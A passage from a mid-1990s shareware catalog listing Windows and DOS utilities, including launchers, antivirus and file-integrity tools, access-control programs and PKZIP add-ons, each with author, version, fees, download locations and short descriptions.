ELFTREE + Packs 100s of file/dir/pgm management utils. See full + description on page 196. + + Product: FYI2/Business Office Manager + Employee database, address book, business. See full + description on page 249. + + Product: New Menus for Windows + X-Win/Win4 like shell and desktop enhancement. See full + description on page 188. + + Chapter 2, "Utilities" 201 + + + + Product: Program Group Specialist + Author: MIS Resources International, 404-594-7500 + Version: 1.0 (05-23-95) + Needs: IBM AT (80286), Windows 3.1 or better. CGA monitor; + Mouse; VBRUN300.DLL. + Registration fee: $20.00 (add $2.50 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, CompuServe, mail + support; 3-month return policy; royalty-free runtime license; + LAN license; site license; all ASP-wide offers (see page 6). + 6-month free upgrading allowed. + Look for: availability unknown on BBSs; RIGS10.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 4 (or contact userID 75350,205 + for assistance). + Download size: 48k (about four minutes with a 2400 baud modem) + Description: + RI-group Specialist makes adding icons to your Program Manager + simple: select a group to add to and then double click on the + program you want to add. Fully functional. + + + Product: ROLLCALL.DBMS + Employee tracking system. See full description on page 174. + + Product: Sloop Manager + Author: Sloop Software, 719-260-0433 + Version: 1.2c (01-07-93) + Needs: IBM AT (80286), Windows 3.0 or better. 100k RAM; EGA + monitor; Hard disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $35.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs; SLPMAN.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 72540,144 + for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Replaces MS Windows Program Manager as the Windows shell. + Features include ability to create subfolders (subgroups); + multi-select capability adding, deleting, moving or copying + items between folders; drag/drop interface; password + protection; display items as icons or using only text; easy to + use icon browser dialog for choosing icons plus more. + + Chapter 2, "Utilities" 202 + + + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 217. + + Product: Super Stuff Utilities + Author: Super Tools, 817-382-7585 + Version: 3.1 (10-11-93) + Needs: IBM AT (80286), Windows 3.1 or better. 300k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $20.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; all + ASP-wide offers (see page 6); discounts on other products. + Look for: availability unknown on BBSs; SUPERS.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 9 (or contact userID 70323,3140 + for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A set of Windows based utilities. A fully configurable task + manager that features a run command w/history, launch menu, and + a multi-select list box. A utility that allows you to display + your Program Manager groups anywhere on the desktop. View as + vertical lists, toolbars, or standard groups. Finally, a + Wallpaper manager with cycle support is also included. + + + Product: Teleshare/DOS Remote Access [***] + Basic DOS remote control. See full description on page 445. + + 2.7.6 Software tools + + 2.7.6.1 For multiple programs + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 123. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real batch language you wish DOS had. See full description + on page 125. + + Product: XMENU + Small, fast shell for LHA, PKZIP, ARJ, etc. See full + description on page 199. + + + 2.8 Security programs + + "Shareware is as safe as [retail] software if obtained + directly from an author or from a vendor or BBS who + has gotten the disk directly from the author." + - an official ASP statement on shareware + + Chapter 2, "Utilities" 203 + + + + See also: Utilities, File utilities, Backup/restore; Utilities, + File utilities, File encryption; Utilities, File utilities, + File archiving & compression; Utilities, File utilities, File + comparison; Utilities, System utilities, Recovery utilities. + + Product: DaMenu + A premier point & shoot DOS menu. See full description on + page 184. + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 187. + + 2.8.1 Virus/Trojan detectors + + Product: FileSafe + Easy, foolproof virus detection system. See full description + on page 208. + + Product: Flu_Shot+ + Author: Software Concepts Design, 914-586-2023 + Version: 1.83 (07-11-93) + Needs: IBM PC, DOS 2.1 or better. 16k RAM. + Strongly recommended: CGA monitor; Hercules monitor. + Registration fee: $15.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, BBS, CompuServe, GEnie, mail support; + discounts on upgrades. + Look for: FSP*.ZIP on BBSs (call 212-889-6438 to download it at + no charge); FSP*.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 3 (or contact userID 72461,3212 for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + An active monitoring program for detecting and preventing + computer viruses and insures the integrity of the programs you + use on your system. By selecting the various levels of + protection you wish to install on your system, you can be sure + that the program you are about to run is only the program you + wanted to run and does not contain any computer viruses. + + Winner of PC Magazine's Editor Choice award. Updated on a + regular basis. + + Chapter 2, "Utilities" 204 + + + + Product: Integrity Master(tm) + Author: Stiller Research, 904-574-0920 + Version: 2.11a (11-04-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $4.50 for shipping to U.S. + addresses) (add $4.50 for shipping to Canadian addresses) (add + $9.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of phone, fax, + BBS, CompuServe, GEnie, mail support; 2-month return policy; + bonus utilities; bonus data; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products; + discounts on upgrades. 3-year virus protection guarantee. + Look for: I-M*.ZIP on BBSs (call 904-386-8693 to download it at + no charge); I-MAST.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 3 (or contact userID 72571,3352 for assistance); I- + M*.ZIP on GEnie in M1530 forum LIBrary 1 (or contact userID + W.STILLER for assistance). + SWREG#: 373 + Download size: 320k (about 24 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + A powerful anti-virus and data integrity product. Scan for + viruses and get the extra benefits of CMOS protection, + security, change control, and disk problem detection. Do you + have a flaky hard disk? Did someone change a file while you + were out? Find out for sure! IM enables detection of any virus + (not just "known" ones) and doesn't require periodic updates, + although it recognizes known viruses by name. Unlike its + competition, IM identifies damage caused by a virus, not just + viral infections. + + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 116. + + Chapter 2, "Utilities" 205 + + + + Product: Virus Simulator + Author: Rosenthal Engineering, 805-541-0910 + Version: 2C (01-01-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $25.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited fax, mail support; LAN license; bonus + utilities; all ASP-wide offers (see page 6). Bonus "MtE", Boot + sector, & companion virus supplements. + Look for: VIRSIM2C.ZIP on BBSs (multiple files) (call + 805-258-6172 to download it at no charge). + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Safely demonstrate your anti-virus protection. Selected as + + + 2.8.2 Virus cleanup/removal + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 204. + + 2.8.3 System activity monitors + + Product: Activity Monitor + Author: Louis Desjardins + Version: 1.1 (07-31-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive; EGA monitor; Hercules monitor; Hard disk; + VBRUN300.DLL. + Strongly recommended: VGA monitor; Mouse; XMS memory. + Registration fee: $15.00 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $2.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, fax, CompuServe, mail + support; all ASP-wide offers (see page 6). 3-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; AMON11.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 72202,3662 + for assistance). + SWREG#: 2444 + PsL#: 11466 + Download size: 115k (about nine minutes with a 2400 baud modem) + Description: + A small utility designed to monitor all activity on a computer + running Windows 3.1 or later. It keeps an encrypted log. Can + read, print or generate an activity report from the log file. + Can run under the Stealth (invisible) mode, or under the + Visible mode. Five different installation options to suit your + + Chapter 2, "Utilities" 206 + + + + needs, with de-installation routines. Best features, best + documentation, best support, easiest in its class! + + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 204. + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 344. + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 116. + + 2.8.4 File integrity monitors + + Product: FileSafe + Author: JAYAR Systems, 416-751-5678 + Version: 1.02 (05-15-94) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + royalty-free runtime license; bonus utilities; all ASP-wide + offers (see page 6). + Look for: FLSF102.ZIP on BBSs (call 519-940-0007 to download it + at no charge). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + A virus detection system that protects your computer from virus + attack by alerting you to unexpected changes in your executable + files or boot record. Unlike other CRC-based utilities, this + uses a sophisticated message digest algorithm that cannot be + inverted. FileSafe can detect any changes no matter how well + covered. FileSafe is easy to use, unobtrusive, takes up little + space and comes with a comprehensive users manual that + discusses viruses and strategies for using FileSafe. + + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 204. + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 204. + + Chapter 2, "Utilities" 207 + + + + Product: Master Disk + Prepares diskette masters for duplication. See full + description on page 32. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 51. + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 116. + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 204. + + 2.8.5 Computer access security + + See also: Utilities, Menu systems & file managers. + + Product: DATA PROTECTOR + Author: PIGAS INC. + Version: 2.00 (02-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Registration fee: $35.00 + Registration benefits: 31/2" master disk(s); 3 months of fax, + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: PIGAS.ZIP on BBSs; PIGAS.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 72172,2063 for + assistance). + PsL#: 11015 + Download size: 225k (about 17 minutes with a 2400 baud modem) + Description: + Protect the information in your PC against unauthorized access. + The protected data becomes totally unavailable even when using + a powerful disk utility or booting from a diskette. Unlimited + number of users, each one having a unique password. Full report + about authorized/unauthorized activity in the system. Fast + hide/open operation. Easy configuration program to allow + selection of data to hide. Simple call to login/logout program + to start or end a user session. + + Chapter 2, "Utilities" 208 + + + + Product: Local Access Logon + Author: M2w Software + Version: 2.12 (10-12-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $29.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; LALOG*.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 100120,2335 + for assistance). + SWREG#: 1947 + Download size: 390k (about 29 minutes with a 2400 baud modem) + Description: + Permits a system administrator to define users (max 500) and + groups (max 100). Each user group defines the access rights of + all member users and defines the start application or + accessible Program Manager groups. The system administrator may + define a Windows or MS-DOS application as the program that + starts up after the user logged on with a valid username/ + password pair. Each user group describes the access rights. May + users enter the DOS prompt? May users install applications? + Etc. + + + Product: PC-Vault + Author: Johnson Computer Systems, Inc., 804-872-9583 + Version: 4.6 (08-09-93) + Needs: IBM PC, DOS 2.0 or better. 6k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive; + Hard disk. + Registration fee: $38.00 (add $4.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; 3-month return policy; bonus utilities; all ASP- + wide offers (see page 6); discounts on other products. + Look for: VAULT.ZIP on BBSs (call 804-877-6261 to download it at + no charge). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A password is required to access your hard disk(s) even when + booting from a floppy. The LunchBreak feature blanks the + screen and locks the keyboard/mouse via hot key or after + inactivity. The administrator can assign up to 12 user names + and passwords, can prevent Ctrl-Break out of AUTOEXEC, control + password aging/reuse, log invalid access attempts, determine + which AUTOEXEC statements are executed for each user, restrict + a user to a single application, and more. Includes file + encryption utility. + + Chapter 2, "Utilities" 209 + + + + Product: PC-Vault Plus + Author: Johnson Computer Systems, Inc., 804-872-9583 + Version: 4.6 (08-09-93) + Needs: IBM PC, DOS 2.0 or better. 14k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Hard disk. + Registration fee: $98.00 (add $4.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS support; + 3-month return policy; bonus utilities; all ASP-wide offers + (see page 6); discounts on other products. 1-month free + upgrading allowed. + Look for: PLUS.ZIP on BBSs (call 804-877-6261 to download it at + no charge). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Provides password protection even on floppy boot. LunchBreak + feature locks keyboard/mouse and blanks screen on hot key or + after inactivity. Administrator can control each user's read/ + write/execute access to directories, floppies, and I/O ports, + log user activity and invalid access attempts, disable Ctrl- + Break, control password aging and reuse, control AUTOEXEC + statements executed for each user, much more. + + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 344. + + Product: WinSecure + Personal screensaver w/password & messages. See full + description on page 79. + + + 2.9 Software tools & add-ins + + 2.9.1 For multiple programs + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 187. + + Product: RI-VB Database Toolkit v1.1 + Utility to develop VB and Access apps. See full description on + page 491. + + Chapter 2, "Utilities" 210 + + + + Product: SensuVoX I + Author: Unicorn Software Limited, 816-429-3558 + Version: 0.00 (01-29-95) + Needs: IBM 80386, Windows 3.1 or better. sound card. Program + capable of playing WAVs. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, newsletter, + mail support; bonus data; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. + Look for: SVOXI.ZIP on BBSs (call 317-784-2147 to download it at + no charge); SVOXI.ZIP on CompuServe in CIS:WINFUN forum LIBrary + 5 (or contact userID 70272,3317 for assistance). + SWREG#: 4508 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + SensuVoX I is a collection of over 500 WAV files from 5 + different vocalists designed to work with speech programs + within Windows. It allows you to give your PC a "Sensual + Voice". The project has over 100 standard Window's commands, + Solitaire commands, talking clock, and "TastyBits" + (miscellaneous and provocative comments) from each of the + vocalists. This set features four female (Ciara, Oceania, + Linda & Sheree) and one male (Pete) vocalist. All WAVs are in + English in this set. + + + 2.9.2 For operating systems + + See also: Utilities, System utilities, Operating systems; + Utilities, System utilities, Multi-OS utilities. + + 2.9.2.1 MS-DOS + + See also: Utilities, Software tools & add-ins, For JP Software, + For 4DOS/NDOS. + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 43. + + 2.9.2.2 Windows + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 123. + + Product: AMF Daily Planner & P.I.M. + Hot! The best & easiest PIM for Windows. See full description + on page 143. + + Chapter 2, "Utilities" 211 + + + + Product: AMF Intelligent Organ for Win + Organ for Windows - play it with your mouse! See full + description on page 629. + + Product: AMF Multimedia Jukebox (WIN) + Author: AMF Shareware Productions + Version: 1.0 (05-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. sound card; + VBRUN300.DLL. Video Extensions (for Video). + Registration fee: $10.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: JBOX.ZIP on BBSs; JBOX.ZIP on CompuServe in CIS:WINSHA + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 3386 + Download size: 105k (about eight minutes with a 2400 baud modem) + Description: + Now you can play any Multimedia file that you have drivers/ + extenions for as many times as you want. Queue as many + selections as you would like, save the lists, and with one + click have your pre-programmed list playing. Will play AVI, + MOV, WAV, VOC, FLI, FLIC, MIDI, etc. Can act as just a simple + multimedia player as well. Has a beautiful 3D interface. Easy + to use. Full help included. + + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 200. + + Product: ClipMate for Windows + Author: Thornton Software Solutions, 716-227-6505 + Version: 3.02 (07-27-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM. + Registration fee: $25.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; bonus utilities; disks of + other shareware; discounts on upgrades. 2-month free upgrading + allowed. + Look for: CLIPMT30.ZIP on BBSs; CLIPMT.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 6 (or contact userID 70743,2546 for + assistance). + SWREG#: 173 + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Remembers all items that you copy to the Windows clipboard. + Lets you view, edit, combine, and print clipboard data. Support + for most clipboard formats, including BMP, Picture, RTF, OLE, + and more! Exclusive PowerPaste(tm) provides rapid pasting into + applications. Features: auto configuration, better OLE2 + support. + + Chapter 2, "Utilities" 212 + + + + "ClipMate turns the Windows Clipboard from an + underpowered utility into a true power tool" - PC + Computing + + + Product: CommEx [***] + Author: Cottonwood Software, 913-663-3022 + Version: 1.00 (08-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 12-month free upgrading allowed. + Look for: availability unknown on BBSs. + PsL#: 14153 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Common dialog extensions for Windows 3.1/3.11. Adds file + management functions like Find, Copy, Delete, Rename, and + MakeDir to the Open and Save dialogs of most Windows + applications. No more jumping back and forth between your + application and File Manager or DOS to do common functions! + Search every disk drive at once for files (multiple masks, + too!) Make a new directory as you save files, delete old + versions, make backups before you open a file, etc. - all from + the Open/Save dialog! + + + Product: Elbow Grease for Windows v1.0 + Author: AMF Shareware Productions + Version: 1.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. VBRUN300.DLL. + Registration fee: $19.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: ELBOW.ZIP on BBSs; ELBOW.ZIP on CompuServe in + CIS:WINSHA forum LIBrary 5 (or contact userID 74250,1700 for + assistance). + SWREG#: 3048 + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + This little program sits on the bottom of your screen in only + 1.5 inches. Has a "double toolbar" which allows up to 40 + programs to be launched with one click. Full-sized icons and + user-specified ToolTips. Has a to-do List, and perpetual + calendar to the year 9000. Has drag & drop File Manager + launching, games like Tic Tac Toe, and a whole slew of other + utiltites. Easy to use and operate, Full help included. + + Chapter 2, "Utilities" 213 + + + + Product: File Finder for Windows + Author: Simian Id Software, 314-781-8709 + Version: 3.0 (08-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $20.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; discounts on upgrades. 1 free update disk(s) sent + out. + Look for: WFIND30.ZIP on BBSs (call 314-638-3041 to download it + at no charge); WFIND.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 2 (or contact userID 73613,3606 for assistance). + SWREG#: 3540 + PsL#: 11569 + Download size: 95k (about seven minutes with a 2400 baud modem) + Description: + A file search program for Windows 3.1. It can search all + drives, and can search the most popular archive types. (ARC, + ARJ, ZIP, ZOO, LBR, LZH, PAK, and PKA.) The list of files can + be printed or copied to other applications. Search types + include standard DOS, substring, regular expressions, date, + time, and size. Launch applications based on filetype. "After + using it once, I deleted from my system all other pretenders." + Earl Watt, The Computer Power Station. + + + Product: Free System Resources + Notification of low memory resources. See full description on + page 69. + + Product: GARDENING BUSINESS + Software for managing small gardening bus. See full + description on page 368. + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 397. + + Chapter 2, "Utilities" 214 + + + + Product: Mouse Clock (tm) for Windows + Author: AMF Shareware Productions + Version: 1.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Mouse. + Registration fee: $10.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: MCLOCK.ZIP on BBSs; MCLOCK.ZIP on CompuServe in + CIS:WINSHA forum LIBrary 5 (or contact userID 74250,1700 for + assistance). + SWREG#: 3250 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + Virtually becomes part of the cursor. It displays the current + time in US or 24-hr versions, seconds, free system resources, + and if the rate clock is active, the current total. Totally + configurable. Easy to use. Beneficial utility for WinCIM users! + It's smart, you can tell it when to stay out of the way, or + have it always on top. Never interferes with your mouse + operations. Great little utility! + + + Product: Papers + Author: clySmic Software, 518-438-5548 + Version: 1.00 (12-01-93) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; PAPERS.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0. + Download size: 89k (about seven minutes with a 2400 baud modem) + Description: + bla + + + Product: Playground + Tool for building object models. See full description on + page 453. + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 43. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 51. + + Product: SAB Diskette Utility + Format/copy/convert/save diskette images. See full description + on page 32. + + Chapter 2, "Utilities" 215 + + + + Product: Screen Saver Sampler + Windows screen saver with password protection. See full + description on page 79. + + Product: SmilerShell + Author: Bardon Data Systems, 510-526-8470 + Version: 3.0 (03-29-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $29.95 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $9.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; SMISHL.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 9 (or contact userID 72340,375 + for assistance). + SWREG#: 1186 + Download size: 100k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + This Windows control center & cmdline takes NO screen space! + Right-click on roving titlebar button to launch from your + favorite-apps list, or switch to running app. Left-click pops + up ultimate Win cmdline: runs DOS & WIN pgms, pipes/redir; + hist/edit/srch; aliases (type-in or Fn key); fast dir change + over multiple drives; find files by name or contents; cal/ + clock, curr dir, Win mem/rsrcs, more! "Best Util 1994" finalist + (SIA) "Must-have, recommended" (Windows Mag) "Brilliant" (PC + Plus) + + + Product: Technical Editor (Windows NT) + Programmers/text editor. See full description on page 228. + + Product: WDiff + Windows file/directory/ZIP difference viewer. See full + description on page 58. + + Product: wfListen + Mediates between comms program & WinFax. See full description + on page 422. + + Product: Win Change + Globally find and change text in files. See full description + on page 67. + + Product: Win Multiple Configurations + Allows 100 different Windows configurations. See full + description on page 134. + + Chapter 2, "Utilities" 216 + + + + Product: WinZip + Windows ZIP util w/drag & drop, built-in ZIP. See full + description on page 53. + + Product: WizManager + Fantastic File Manager add-on. See full description on + page 194. + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 55. + + 2.9.2.3 OS/2 + + Product: RexxBase + The dBase Database For Rexx. See full description on page 455. + + 2.9.3 For JP Software + + See also: Utilities, Software tools & add-ins, For Norton. + + Product: 4EDIT + Author: XD Systems, 703-821-3215 + Version: 2.00 (03-06-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 6 months of unlimited phone, CompuServe, mail + support. lifetime return policy. 6-month free upgrading + allowed. + Look for: 4EDIT20.ZIP on BBSs; 4EDIT.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 1 (or contact userID 70741,3711 for + assistance). + Download size: 117k (about nine minutes with a 2400 baud modem) + Description: + DESCRIPTION editor for use with 4DOS. Has important features. + Windowed editor shows the entire description, making it easy to + attach descriptions (up to 200 chars) to your files. Has built- + in file viewer and allows copying and pasting descriptions from + text in files or other descriptions. Change directories from + within 4EDIT. Supports mouse. Extensive on-line help. User- + configurable. + + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 219. + + Chapter 2, "Utilities" 217 + + + + Product: USEMGR + Know how many times each file on disk is used. See full + description on page 25. + + Product: ZIP Fugue (DOS) for PKZIP/UNZIP + ZIP front end - automates 4DOS file descripts. See full + description on page 221. + + Product: ZIP Fugue (Windows) + ZIP handler - automates 4DOS file descripts. See full + description on page 221. + + 2.9.3.1 For 4DOS/NDOS + + Product: 4FILES [***] + File manager, annotator and program launcher. See full + description on page 35. + + 2.9.4 For Lotus + + Product: Sci & Eng Tool for Lotus 1-2-3 + Solver and programmable calculator for 1-2-3. See full + description on page 309. + + Product: Super Macro Library for 1-2-3 + A library of super power macros for 1-2-3. See full + description on page 275. + + 2.9.5 For Norton + + See also: Utilities, Software tools & add-ins, For JP Software. + + 2.9.5.1 For Norton Utilities + + Product: 4FILES [***] + File manager, annotator and program launcher. See full + description on page 35. + + Chapter 2, "Utilities" 218 + + + + 2.9.6 For PKWARE + + 2.9.6.1 For PKZIP/PKUNZIP + + Product: 4ZIP/4UNZIP + Author: XD Systems, 703-821-3215 + Version: 2.01 (12-14-91) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. 4DOS; PKZIP/PKUNZIP. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; bonus utilities. 6-month free upgrading + allowed. + Look for: 4ZIP201.ZIP on BBSs; 4ZIP.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 1 (or contact userID 70741,3711 for + assistance). + Download size: 143k (about eleven minutes with a 2400 baud modem) + Description: + A utility for 4DOS. Used with the PKWare compression program + PKZIP, it compresses 4DOS file descriptions along with the + files. The included program 4UNZIP calls PKUnzip and restores + the descriptions as each file is uncompressed. Select files to + Zip or Unzip from a full-screen list with extended wildcards. + Pass through commands to PKZIP and PKUNZIP, obtained + separately. Supports 4DOS 4.0 80 character descriptions and + extended fields. + + + Product: BCM Menu System + Menu, disk maint,text editor & compress shell. See full + description on page 196. + + Product: ExamineZip + Text retrieval program for ZIP archives. See full description + on page 18. + + Product: PMZIP + OS/2 Presentation Manager ZIP shell. See full description on + page 50. + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 193. + + Product: USEMGR + Know how many times each file on disk is used. See full + description on page 25. + + Chapter 2, "Utilities" 219 + + + + Product: WinZip + Windows ZIP util w/drag & drop, built-in ZIP. See full + description on page 53. + + Product: XMENU + Small, fast shell for LHA, PKZIP, ARJ, etc. See full + description on page 199. + + Product: ZIP Fugue (DOS) for PKZIP/UNZIP + Author: Fugue Software, +61-7-824-2843 + Version: 1.2 (04-19-94) + Needs: IBM PC, DOS 3.3 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; ZIPD12.ZIP on CompuServe + in CIS:PCVENB forum LIBrary 10 (or contact userID 100036,311 + for assistance). + Download size: 65k 